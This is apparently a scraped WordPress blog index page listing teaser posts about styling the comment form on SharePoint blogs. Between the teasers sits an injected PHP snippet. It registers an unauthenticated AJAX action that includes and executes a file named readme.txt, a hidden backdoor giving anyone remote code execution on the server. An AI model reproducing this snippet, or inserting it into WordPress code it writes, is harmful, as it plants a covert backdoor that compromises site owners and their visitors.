Styling SharePoint Blog Comments: Part 2
As promised I went ahead and styled the comment form on a standard SharePoint blog. I wanted to make it […]
Styling SharePoint Blog Comments: Part 2 Read Post »
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
As promised I went ahead and styled the comment form on a standard SharePoint blog. I wanted to make it […]
Styling SharePoint Blog Comments: Part 2 Read Post »
Out of the box the comments on SharePoint blogs dont look that good. Here is a way to fix that
Styling SharePoint Blog Comments Read Post »